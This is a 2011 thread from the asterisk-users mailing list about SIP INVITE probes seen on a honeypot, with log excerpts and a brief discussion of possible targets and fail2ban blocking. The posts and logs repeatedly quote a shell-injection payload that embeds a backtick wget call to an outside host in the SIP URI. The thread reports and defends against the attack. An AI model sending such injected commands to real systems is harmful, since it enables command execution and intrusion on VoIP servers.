Tom Browning
2011-Sep-11 23:05 UTC
[asterisk-users] new sort of shell attack attempt via SIP?
I haven't seen this sort of URI/shell attack prior to today but it looks interesting. Embedding a backtick in the URI with a wget that doesn't seem to do much to an empty file. I'm guessing it is just a probe to see if they can send further embedded backtick shell commands to my Asterisk instance (by watching their weblogs @ 91.223.89.94) (This happens to be my "honeypot" that just accepts all calls and dumps them into one big Asterisk 10 beta ConfBridge :-) INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0. Does Asterisk have shell injection weakness? Or perhaps this targets some other Asterisk config manager that is subject to injection via URI? Tom
Alex Balashov
2011-Sep-11 23:20 UTC
[asterisk-users] new sort of shell attack attempt via SIP?
On 09/11/2011 07:05 PM, Tom Browning wrote:> INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x > SIP/2.0.My guess is that this attack presumes you are running a web GUI such as FreePBX, and that it does not sanitise embedded HTML. Thus, when reviewing your CDRs, for instance, you might click on such a link. A more sophisticated variant of that would embed <script> tags and a with a shortened URL (overall small enough to fit inside a SIP display name field or whatnot) to effectuate a cross-site scripting attack. -- Alex Balashov - Principal Evariste Systems LLC 260 Peachtree Street NW Suite 2200 Atlanta, GA 30303 Tel: +1-678-954-0670 Fax: +1-404-961-1892 Web: http://www.evaristesys.com/
Saqib Butt
2011-Sep-12 21:02 UTC
[asterisk-users] new sort of shell attack attempt via SIP?
I have seen this recently in my logs as well [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:1] NoOp("SIP/5060-0000002c", "Received incoming SIP connection from unknown peer to 00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:2] Set("SIP/5060-0000002c", "DID=00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:3] Goto("SIP/5060-0000002c", "s,1") in new stack [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,s,1) [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [s at from-sip-external:1] GotoIf("SIP/5060-0000002c", "0?from-trunk,00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`,1") in new stack [2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,//91.223.89.94/V.php`,1) So can this be blocked via fail2ban and by adding a new REGEX ? Thanks Saqib -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://lists.digium.com/pipermail/asterisk-users/attachments/20110912/48241f85/attachment.htm>